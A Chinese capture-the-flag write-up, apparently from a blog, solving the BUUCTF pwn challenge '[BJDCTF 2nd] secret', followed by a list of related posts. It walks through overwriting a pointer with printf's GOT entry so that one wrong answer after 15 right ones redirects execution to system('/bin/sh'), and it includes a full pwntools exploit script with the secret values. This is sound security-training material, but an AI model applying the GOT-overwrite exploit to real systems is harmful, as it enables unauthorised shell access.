BUUCTF(pwn)[BJDCTF 2nd]secret
感觉这道题技巧性比较强
有两次输入 一次名字,一次 密码
先进 46A3AF
这里有一次输入 name
看一下 0x40136D的汇编
这里每次有一次 调用 0x46A329,并且 有一次cmp比较; 那么进入 0x46a329
进去看看0x401301
发现 printf_plt 的位置 与 system的位置相差0x10即16
我们可以一开始输入name的时候输入bin/sh; 把0x46d090覆盖为printf_plt,
经过16次输入比较, 前15次输入对的,最后一次输入错误的,使地址偏移为 system,
得到flag;
思路
输入name 为 bin/sh
修改off_46D090, 为printf_got。
答对15次,答错一次刚好16次即0x10
使得printf_got指向system
from pwn import *p = remote('node3.buuoj.cn',26671)elf = ELF('./2')printf_got=elf.got['printf']keys=[0x476B,0x2D38,0x4540,0x3E77,0x3162,0x3F7D,0x357A,0x3CF5,0x2F9E,0x41EA,0x48D8,0x2763,0x474C,0x3809,0x2E63]payload='/bin/sh\x00'.ljust(0x10,'a')+p32(printf_got)p.sendlineafter("What's your name?",payload)for a in keys:p.sendlineafter('Secret:',str(a))p.sendlineafter('Secret:','1')p.interactive()
BUUCTF(pwn)[BJDCTF 2nd]secret相关推荐
- [BUUCTF-pwn]——[BJDCTF 2nd]secret
[BUUCTF-pwn]--[BJDCTF 2nd]secret 这道题目,看就考验你的汇编能力了. 因为在反汇编的过程中,有一个函数过大,无法反汇编 在IDA中看到一个格外令人喜欢的东西,可是if ...
- BUUCTF:[BJDCTF 2nd]EasyBaBa
题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]EasyBaBa binwalk分析,foremost分离 解压压缩包得到里面都是出题人.jpg 010 ...
- BUUCTF:[BJDCTF 2nd]圣火昭昭-y1ng
题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]%E5%9C%A3%E7%81%AB%E6%98%AD%E6%98%AD-y1ng 新约佛论禅加密 新约佛 ...
- ------已搬运-------BUUCTF:[BJDCTF 2nd]假猪套天下第一-----------Header请求头学习!!!
了解这个:Header:请求头详解.就全都会了.就,, 最水记录,,,, 不足: 1.tmd.抓包瞎jb抓,有登录页面,不知道抓包的时候输入参数,抓输入参数的时候的包,我真吐了,,,哎,怎么能这么傻啊 ...
- BUUCTF:[BJDCTF 2nd]假猪套天下第一
先测试一下admin用户,发现会回弹 在测试一下其他账户,发现会进入 (下面那个root点进去是y1ng师傅的网站) 我们试着抓个包,发现存在着一个提示 打开这个L0g1n.php发现里面是 提示99 ...
- [BUUCTF-pwn]——[BJDCTF 2nd]ydsneedgirlfriend2
[BUUCTF-pwn]--[BJDCTF 2nd]ydsneedgirlfriend2 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]ydsneedg ...
- [BUUCTF-pwn]——[BJDCTF 2nd]r2t3
[BUUCTF-pwn]--[BJDCTF 2nd]r2t3 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3 题目: 先将文件下载下来,chec ...
- buuctf pwn wp(第四波)格式化字符串漏洞系列
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理.) 这一波题都是无脑AAAA的类型,它 ...
- [BJDCTF 2nd] Web复现 wp
文章目录 [BJDCTF 2nd] fake google [BJDCTF 2nd]old-hack [BJDCTF 2nd]假猪套天下第一 [BJDCTF 2nd]duangShell [BJDCT ...
最新文章
- 神州数码使用telnet方式管理交换机
- Hessian RPC示例和基于Http请求的Hessian序列化对象传输
- sqlite3.OperationalError: database is locked
- 吐血,经过4个小时,终于发现这个可以解决虚拟机ubuntu不能联网的问题
- mysql 导出gbk_mysqldump指定编码导出数据,GBK编码实践
- vue-cli的初步使用
- 选择题_一级造价师选择题的分值是多少
- 【Rpc】基于开源Dubbo分布式RPC服务框架的部署整合
- CSS练习_无限滚动
- php短路逻辑,JS利用短路原理简写if语句
- 【Oracle 集群】ORACLE DATABASE 11G RAC 知识图文详细教程之RAC 工作原理和相关组件(三)...
- 使用JAVA实现邮件发送功能
- 异贝,通过移动互联网技术,为中小微实体企业联盟、线上链接、线上线下自定义营销方案推送。案例8
- Filezilla Server使用教程
- Matlab求解微分、积分方程
- Java-Aspose实现上传Excel、Word转换为PDF并进行下载
- 博图SCL 选择排序
- 系统分析员、系统架构师、项目经理的区别
- 怎样才能在网上快速赚到钱?
- 神经架构搜索(NAS)2020最新综述:挑战与解决方案